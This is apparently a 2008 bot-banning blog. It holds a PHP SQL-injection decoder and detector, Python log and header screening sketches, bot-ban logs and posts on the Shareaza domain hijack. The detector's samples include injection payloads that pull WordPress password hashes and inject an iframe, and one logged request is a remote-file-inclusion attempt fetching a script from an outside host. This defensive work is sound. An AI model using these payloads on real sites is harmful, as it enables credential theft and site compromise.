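{
    for ($i = 0; $i < $max; $i++) {
        $next = urldecode($s);      // also turns '+' into a space
        if ($next === $s) {
            break;
        }
        $s = $next;
    }
    return $s;
}

// Turn MySQL CHAR(58,124,...) and 0x48... literals into quoted strings. CHAR(4000)
// in the T-SQL sample is a type, not a call, so codes above 255 are left alone.
// The same 0x form is what the CAST(0x... AS CHAR(4000)) attack wraps.
function render_literals(string $sql): string
{
    $sql = preg_replace_callback('/\bCHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/i', function ($m) {
        $codes = array_map('intval', explode(',', $m[1]));
        if (max($codes) > 255) {
            return $m[0];
        }
        return "'" . implode('', array_map('chr', $codes)) . "'";
    }, $sql);
    return preg_replace_callback('/\b0x([0-9a-f]+)\b/i', function ($m) {
        $hex = $m[1];
        $hex = substr($hex, 0, strlen($hex) - strlen($hex) % 2); // drop a dangling nibble from a truncated log line
        return "'" . hex2bin($hex) . "'";
    }, $sql);
}

// Indicators worth alarming on once the text is decoded.
function injection_indicators(string $decoded): array
{
    $patterns = [
        'union-select'   => '/\bUNION\b(?:\s+ALL)?\s+SELECT\b/i',
        'tsql-declare'   => '/\bDECLARE\s+@\w+/i',
        'tsql-exec'      => '/\bEXEC\s*\(\s*@/i',
        'timing-probe'   => '/\b(?:BENCHMARK|SLEEP)\s*\(/i',
        'comment-tail'   => '/(?:\/\*|--)\s*$/',
        'wp-users-table' => '/\bFROM\s+wp_users\b/i',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function analyse(string $raw): array
{
    $decoded = render_literals(decode_repeatedly($raw));
    return ['decoded' => $decoded, 'indicators' => injection_indicators($decoded)];
}

// Constructed samples modelled on the Dec 3, Aug 22, Apr 14 and Mar 13 posts.
$samples = [
    'query'  => 'cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666)+FROM+wp_users+where+id=1/*',
    'tsql'   => 'id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
              . bin2hex("UPDATE t SET c=c+'<iframe src=http://example.invalid/>'")   // stand-in for the removed hex
              . '%20AS%20CHAR(4000));EXEC(@S);',
    'cookie' => "wordpressuser_abc=xyz%27 UNION ALL SELECT 1,2,user_pass,4 FROM wp_users WHERE ID=1 AND IF(LENGTH(user_pass)>31,BENCHMARK(1,MD5(1337)),3)/*",
    'nuke'   => 'cid=2%20UNION%20select%20counter,%20aid,%20concat(pwd,0x7c,0x4861636B2042792053694)%20from%20nuke_authors/*',
];

foreach ($samples as $label => $raw) {
    $r = analyse($raw);
    printf("%-6s %s\n       %s\n", $label, $r['decoded'], implode(', ', $r['indicators']) ?: 'none');
}
```

Run as a script, it prints each sample decoded and its indicator list, for example union-select, comment-tail and wp-users-table for the query sample. The point for a ban module is the order of operations: decode to a fixed point first, render the literals, and only then match keywords, otherwise %2527 and CHAR() walk straight past the filter.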

Mar 9, 2008

Full story on Shareaza (www.shareaza.com is no longer Shareaza; go to shareaza.sourceforge.net)

The full story and history on Shareaza.


Beginnings Are a Good Place To Start

In mid 2002, a lone programmer by the name of Michael Stokes released the first version of a Gnutella client he had written and dubbed "Shareaza". Over the next two years Michael added to his client and coded in support for the eDonkey 2000 network, BitTorrent and a rewritten Gnutella-based protocol which he named Gnutella2. Shareaza gradually became more and more popular and Mike started to receive job offers based on the strength of his work on Shareaza. He eventually decided that continuing to work on a p2p application in an increasingly hostile legal climate was too risky, but he did the honorable thing and released the Shareaza source code under the GNU GPLv2 on June 1, 2004 (which coincided with the release of Shareaza version 2.0).

Mike stopped working on Shareaza and went on to develop a new p2p-based streaming radio project named Mercora. As part of distancing himself from Shareaza, he transferred the shareaza[DOT]com domain to one of his old alpha testers named Jon Nilson who continued to administer the domain until late 2007.

The French Connection

In late 2007 the Shareaza website went down for several weeks, but eventually came back online. Not long after that, the shareaza[DOT]com domain began pointing to a different website which several sharp-eyed community members recognized as identical to shareazaweb.com, a known scam site purporting to offer users "legal p2p downloads". It soon emerged that Jon Nilson had been forced to relinquish control of the domain as part of a settlement with La Societe Des Producteurs De Phonogrammes En France (the French version of the RIAA). Jon's name was the only one connected with Shareaza that the SPPF could find and due to Shareaza's popularity in France he had been named in a lawsuit along with Azureus and Morpheus. See (viewtopic.php?f=46&t=85) for more information.

A Dump for Ill-Gotten Gains

Members of the Shareaza community managed to track the new "owners" of the shareaza[DOT]com domain to MusicLab LLC, based in New York. MusicLab now distributes the "new and legal" iMesh p2p client after the original Gnutella-based iMesh developers were sued by the RIAA and were forced to settle for $4.1 million and a promise to turn their app into a paid download service. A similar legal fate befell another popular Gnutella application called Bearshare which was then rolled into the RIAA-approved iMesh. Nobody has managed to ascertain whether the original iMesh developers are still involved, but the merging of Bearshare seems to indicate that MusicLab is a vehicle into which the recording industry dumps assets acquired through lawsuits.

It would seem that since Shareaza is developed by an anonymous group of individuals and organized via "ad-hocracy", there was no company to sue, so stealth tactics were employed against the weakest link in the chain: Jon Nilson. iMesh, Bearshare and the fake Shareaza being distributed from shareaza[DOT]com are all the same application with appropriate rebranding.


Threats of C&D

As you can imagine, the members of the Shareaza community were rather upset about all of this and set up a new website with user forums. After two users made some offhand remarks about a distributed denial of service attack against the servers in Israel where the hijacked shareaza[DOT]com site is located, our forum administrator received an email from one Jeffrey A. Kimmel of Meister Seelig & Fein, in his capacity as a representative of Discordia Ltd, the new "owners" of Shareaza. Mr Kimmel stated that DDoS attacks are illegal and any further talk by "users [who] begin to promote the destruction of a legitimate business" would result in Discordia Ltd "tak[ing] all necessary action to vigorously and relentlessly protect its rights." He went on to state that "if this action is not immediately taken and, as result, our client's business is harmed, we will not only pursue, locate and hold fully responsible each and every one of those who have implemented this, or any similar DoS, but also those responsible for maintaining your site and the forums."

The posts in question had actually been taken down by forum moderators already (as per forum rules on objectionable content), however this email was cause for great concern: not only were the domain hijackers starting to create a series of shell companies to avoid being identified, but they had engaged lawyers to monitor our forums and threaten anyone making disparaging statements about them.

(Full text here: viewtopic.php?f=46&t=752)

A Tangled Web

More research by community members revealed that Discordia Ltd is registered in Cyprus, possibly owned by MusicLab but at arm's length to avoid as much fallout as possible. Meister Seelig & Fein's Kimmel also appears to have a long history of dealings with the recording industry, notably in the participation of the iMesh and Bearshare lawsuits and an interesting Amicus Curiae brief in the MGM vs Grokster which details how the new iMesh software has all the answers to stopping piracy and creating a wonderful legal download service.

Making The Takeover Official

In what is possibly the most audacious step so far, Discordia Ltd filed for a trademark on "Shareaza" with the USPTO on January 10, 2008. (See: http://tmportal.uspto.gov/external/port ... T=77368229)

If granted, our use of the Shareaza name will immediately infringe upon Discordia Ltd's official trademark and we will doubtless be subject to legal action until we stop any infringing action i.e. we rename the project, remove all references to "Shareaza" and forget about the whole thing.


The Danger Posed To Open Source Software

Unless we are able to prevent the trademark being granted and regain control of the domain, our project will die. It really is as simple as that. Seven-odd years' worth of brand recognition as "Open Source, Spyware, Malware and Advertising Free" will disappear and although we can (and have) dealt with "clones" who take our OS code base, add some spyware and release a "new" client as their own (breaking the GPLv2 in the process by not releasing the source) there is no possible way that we can survive having our identity stolen like this. Unlike a run-of-the-mill copyright violation, we are going to be permanently deprived of something. Our code is open to whoever wants to see it, we charge no money for the use of the program; the only thing of value that we have is the name and recognition that goes with it. The worst of it all is that this "software identity theft" could signal the beginning of hostile corporate takeovers of common property - the fact that we are in this predicament proves it to some extent.

What we need to know is if the people who stood up for an open culture by hacking copyright law will help protect that culture where it comes to trademarks and halting the advancement of encroaching corporate interests. If "common law" trademarks can't be protected there is a very real danger that what happened to us will happen again and again and again. Many of us who work on the Shareaza project can foresee things becoming so that people will stop bothering to work on OS projects: open source software is, by its nature, more useful than closed source software and the more useful something is, the more popular it becomes...and then someone with expensive lawyers will come along and take it all away from the people who actually created it.

We recently asked for donations from our users for a legal defense fund and (very) quickly raised $2000. In our public thank you letter we wrote the following:

"In all discussions regarding intellectual property, there is one fundamental right that is never in dispute: the right to be recognized as a creator. This moral right transcends arguments on whether copyright should last for 50 years or a hundred, whether software should be patentable or not, or even what a fair price for an MP3 file is. Being able to say to the world "I made this" and be acknowledged for it is, for many people, the only reward they receive for their work. To deny that right is an insult to the creative forces flowing through every writer, performer, musician, actor and programmer who brings their work to the world."

We have a section dedicated to this whole situation on our new forums (viewforum.php?f=46) which includes full details of all the events that have taken place so far.

Any help you are able to provide would be very, very gratefully accepted. Any advice, introductions or referrals to others who may be able to help us will be a great help.

Kind regards,

Shareaza Community



Feb 29, 2008

new bot trap listings

Why are all of these IPs falling into bot traps?
Looks like a botnet that's trying to spider web sites.


Feb 28, 2008

"Fake Shareaza" takes over updates from the real thing

Posted by Erica George Wed, 20 Feb 2008 21:06:00 GMT

Users of the popular filesharing application Shareaza are reporting that a competitor has taken over a former Shareaza website and is using it to overwrite the real Shareaza application with an impostor posing as an update.

How is that possible? According to Sarah Pike at AppScout:

Someone took great advantage of old code in Shareaza, which checks for updates with, among other URLs, www.shareaza.com, which another company has now registered. So when the real Shareaza does its regular thing and checks in for updates, it offers to download the fake Shareaza to replace itself.
For software producers, this is an important wake-up call. If your software automatically checks a website for updates, you’re responsible for what that website delivers to your users, so it’s important to maintain control of that site.

Users shouldn’t see the Shareaza switch as a reason to forgo software updates. As the AppScout post discusses, in this kind of social engineering scam there are often warning signs that something may not be quite right. Be sure you read dialog boxes carefully before clicking OK and agreeing to anything, including an update. And do your best to stay informed about the software you use by signing up for alerts from the distributor, or regularly checking for news.

--clip----


We warned you about this domain being hijacked a while ago. You are also warned that the software installs some bots on your system, so if you do download this imposter you need to scan your system for adware.

Get the real program at its new location

Feb 20, 2008

ns.allwatch.us spambot

400 Prohibited header 'Proxy-Connection' present
Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)
87.118.118.254 ns.allwatch.us

No traffic should be coming from this domain; it's a RU watch site, so it's banned.

porting Bad Behavior to any PHP script

If you are having trouble porting Bad Behavior to a PHP script, all you have to do is use the scripts in MM Autoban and the work is done for you. Just install BB under the MM Autoban directory. You don't have to use MM Autoban; you can just call BB.

Feb 19, 2008

More Botnets found


Hacker scripts on amyru.h18.ru 70.51.117.24

This joker thought I might be using a filename to load a text file, so he tried to load his hacker file. This is not how I program though, so it would do nothing even if his user agent had not been banned.


package=http://amyru.h18.ru/images/cs.txt? GET HTTP/1.1
Agent: wget/1.1 (compatible; i486; linux; redhat7.3)
70.51.117.24

h18.ru should be added to the hackers file.

The host has shut down amyru.h18.ru:
"Access is forbidden: you cannot obtain access to site amyru.h18.ru because its owner allowed a crude violation of the conditions of free hosting and was deprived of the right of access. All questions should be directed to hs@agava.com."

Feb 14, 2008

MM Autoban

v3.8 has been released; this includes all the bug fixes and some minor fixes.

w32.nopir.c-p2p Virus Removal tool

Since I released this tool back in '06, 118 people have downloaded it to remove this nasty virus. Once you get it, it erases all your music files and then prevents you from booting your system.


Download this program, w32.nopir.c-p2p-worm-fix-v2.zip, on another computer and copy it to your computer; you will likely have to use a CD or a disk. Reboot your computer following the docs and run the script. It will remove the hack files and the hooks that load them. You should then be able to reboot into Windows. This was written for XP; it is unknown how the virus will behave on Vista.

Feb 6, 2008

robot sipost.de

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
81.169.162.124 sipost.de

Not sure what this bot is trying to do. It fell into a bot trap.

A visit to sipost.de tells me access forbidden.

So sipost.de is now banned.

dude.websupport.sk is a robot

Agent: -NO AGENT-
81.89.48.230 dude.websupport.sk

Not sure what this one is, but websupport.sk is now banned.

NASA Web Robot? host.jsc.nasa.gov

403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)
128.157.254.171 host.jsc.nasa.gov

What's this, is NASA running a robot?

maryland.networkphantom.net

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.128.80.15 maryland.networkphantom.net


Another bot. It fell into a bot trap and then tried to post some spam URLs after it was banned.

gts2.westmaster.com spambot

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
81.31.32.41 gts2.westmaster.com

This bot came in and fell in a bot trap. It then went about trying to post spam URLs after it had been banned.

Jan 29, 2008

Some type of botnet using libwww-perl/5.xxx

This all looks to be related; it all showed up at the same time.
Looks to be a botnet.


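
As an added example (not MM Autoban's or Bad Behavior's code), here is a Python script that reads lines in the BB2 CSV layout quoted in this post and flags a user-agent family hitting the site from many distinct addresses inside a short window, which is what makes a listing like this look like a botnet rather than one scanner retrying. The log lines in it are constructed with documentation addresses and .invalid hosts.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the BB2 CSV layout quoted in this post:
#   ip,BB2,[MM-DD-YYYY-HH:MM:SS],host,reason,agent,-
# five libwww-perl hits from five addresses within ten minutes, one
# stray libwww-perl hit a day later, and one browser-style agent.
SAMPLE_LOG = """\
192.0.2.10,BB2,[01-29-2008-16:01:24],host-a.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
192.0.2.11,BB2,[01-29-2008-16:01:28],host-b.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.803,-
192.0.2.12,BB2,[01-29-2008-16:01:43],host-c.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.805,-
192.0.2.13,BB2,[01-29-2008-16:05:06],-,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
192.0.2.14,BB2,[01-29-2008-16:06:10],host-e.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
192.0.2.10,BB2,[01-29-2008-16:10:32],host-a.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.79,-
198.51.100.7,BB2,[01-30-2008-09:12:00],host-z.invalid,403 User-Agent was found on blacklist ,libwww-perl/5.808,-
198.51.100.9,BB2,[01-29-2008-16:02:00],host-y.invalid,403 Fell in bot trap ,Mozilla/4.0 (compatible; MSIE 7.0),-
"""

def parse_bb2_line(line):
    """Split one BB2 line into a dict; none of the fields carry commas."""
    ip, _source, stamp, host, reason, agent, _ = line.split(",", 6)
    when = datetime.strptime(stamp.strip("[]"), "%m-%d-%Y-%H:%M:%S")
    return {"ip": ip, "host": host, "when": when,
            "reason": reason.strip(), "agent": agent}

def ua_family(agent):
    """'libwww-perl/5.805' -> 'libwww-perl': drop the version so different
    builds of the same library cluster together."""
    return agent.split("/", 1)[0].lower()

def find_bursts(log_text, window=timedelta(minutes=30), min_ips=5):
    """Return {ua_family: sorted IPs} for every family that hit the site
    from at least min_ips distinct addresses inside one `window`."""
    by_family = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_bb2_line(line)
            by_family[ua_family(rec["agent"])].append(rec)
    bursts = {}
    for fam, recs in by_family.items():
        recs.sort(key=lambda r: r["when"])
        best, start = set(), 0
        for end, rec in enumerate(recs):          # sliding time window
            while rec["when"] - recs[start]["when"] > window:
                start += 1
            ips = {r["ip"] for r in recs[start:end + 1]}
            if len(ips) > len(best):
                best = ips
        if len(best) >= min_ips:
            bursts[fam] = sorted(best)
    return bursts
```

Run `find_bursts(open("bb2.log").read())` on a real export to get the same family-to-addresses map; the stray next-day hit falls outside the window and does not count toward the burst.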

woriobot heritrix/1.10.0 +http://worio.com) bot

Mozilla/5.0 (compatible; heritrix/1.6.0 +http://www.worio.com/)
137.82.84.97 worio.com

A new bot just showed up claiming another beta test.

This bot is blocked by Bad Behavior for using improper headers.

(edited)
Klaas said...
Could you elaborate on the problem with the headers? I'm eager to fix real and perceived problems with our crawler.


Here is the BB error

bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; woriobot heritrix/1.10.0 +http://worio.com)
207.23.252.129 worio.com


You're just going to have to test it on a blog using Bad Behavior.

If it were a worthwhile bot I would whitelist it but since it doesn't do anything yet why bother. If your project ever gets off the ground let me know and I will erase this post.
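
To make the header problem concrete, here is an added Python sketch (not Bad Behavior's or MM Autoban's own code) of the checks behind the rejection messages quoted across these posts: missing Accept, a Proxy-Connection header, a blacklisted library user-agent, no agent at all, and the bot-trap path. The prefix list and trap path are assumptions, and a denied address stays denied, as with the bots above that kept posting after they were trapped.

```python
# Prefixes of HTTP libraries that real browsers never send; constructed
# list, drawn from the agents reported on this blog.
BLACKLISTED_UA_PREFIXES = ("libwww-perl/", "wget/")
# Hidden link target, disallowed in robots.txt (assumed path).
TRAP_PATHS = ("/bot-trap/",)

def screen_request(path, headers):
    """Return Bad Behavior-style reasons to deny a request, [] if it looks
    like a browser. Header names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    reasons = []
    ua = h.get("user-agent", "").strip()
    if not ua:
        reasons.append("-NO AGENT-")
    elif ua.lower().startswith(BLACKLISTED_UA_PREFIXES):
        reasons.append("403 User-Agent was found on blacklist")
    if "accept" not in h:            # every real browser sends Accept
        reasons.append("403 Required header 'Accept' missing")
    if "proxy-connection" in h:      # only seen from proxies/bots
        reasons.append("400 Prohibited header 'Proxy-Connection' present")
    if any(path.startswith(p) for p in TRAP_PATHS):
        reasons.append("Fell in bot trap")
    return reasons

class Screener:
    """Remember denied addresses so a trapped bot's later spam posts are
    refused outright, whatever headers it sends next time."""
    def __init__(self):
        self.banned = {}

    def handle(self, ip, path, headers):
        if ip in self.banned:
            return ["banned earlier: " + self.banned[ip][0]]
        reasons = screen_request(path, headers)
        if reasons:
            self.banned[ip] = reasons
        return reasons
```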

89.253.240.112 justclickme.org

justclickme.org is running a robot from this IP. It has no agent. A search on Google shows a lot of spam links being posted using that URL as a redirect to another site.
The web server at that domain has a canned preset web page.

Agent: -NO AGENT-
89.253.240.112 justclickme.org

Jan 21, 2008

New proxy server to ban

https://65.110.6.43/ also known as http://proxyweb.net

Add proxyweb.net to the domain ban file and
65.110.6.43 to the IP ban file. Please report any other IPs.

Jan 8, 2008

Shareaza.com domain hijacked

This is not related to robots, but since someone took one of my domains years ago, everyone needs to spread the news. Shareaza, the open source P2P program, has lost its domain name to some pay service. Shareaza has moved to this URL.

The new owners of the domain are pushing some pay software labeled shareazav4.exe; this is not the real Shareaza, which is at this time v2.3.1.0.

See this story here P2P File Sharing: Shareaza site hijacked